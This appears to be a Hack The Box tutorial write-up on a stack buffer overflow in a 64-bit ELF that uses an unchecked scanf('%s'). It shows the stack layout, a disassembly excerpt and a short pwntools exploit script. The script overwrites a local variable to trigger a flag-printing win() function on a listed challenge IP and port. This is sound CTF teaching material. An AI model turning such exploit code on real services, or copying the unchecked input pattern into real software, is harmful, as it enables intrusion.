$ cat writeup.md…
$ cat writeup.md…
hackthebox
Task: Tutorial challenge with 64-bit ELF binary using scanf without length check. Solution: Buffer overflow to overwrite adjacent stack variable and trigger win condition.
$ cat /etc/rate-limit
Rate limit reached (20 reads/hour per IP). Showing preview only — full content returns at the next hour roll-over.
Tutorial challenge for learning buffer overflow basics. Binary file gs — 64-bit ELF with PIE and NX enabled, but no stack canary.
Target: 94.237.63.176:35784
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
rbp-0x30 (offset -48): Buffer[32 bytes] <- user input
rbp-0x10 (offset -16): Alignment[8 bytes] <- initialized to 0x6969696969696969
rbp-0x08 (offset -8): Target[8 bytes] <- initialized to 0xdeadbeef
rbp: Saved RBP
rbp+0x08: Return address
The program uses scanf("%s") to read user input into a buffer without length checking — classic buffer overflow.
17c5: movl $0xdeadbeef, %eax 17ca: cmpq %rax, -0x8(%rbp) ; compare target with 0xdeadbeef 17ce: jne 0x17dc ; if NOT equal — jump to win 17dc: callq 0x11f5 <win> ; win() reads and prints flag.txt
If the target value is changed from 0xdeadbeef to anything else — the win() function is called.
Send 40 bytes to fill buffer (32) + alignment (8), then any additional bytes overwrite target.
[AAAA...AAAA][BBBBBBBB][CCCCCCCC]
Buffer(32) Align(8) Target(8) <- overwritten!
#!/usr/bin/env python3 from pwn import * IP = '94.237.63.176' PORT = 35784 r = remote(IP, PORT) # 40 bytes to target, then overwrite it payload = b'A' * 40 + b'BBBBBBBB' r.recvuntil(b'>') r.sendline(payload) r.recvuntil(b'HTB{', timeout=5) flag = b'HTB{' + r.recvuntil(b'}') success(f'Flag: {flag.decode()}') r.close()
...
$ grep --similar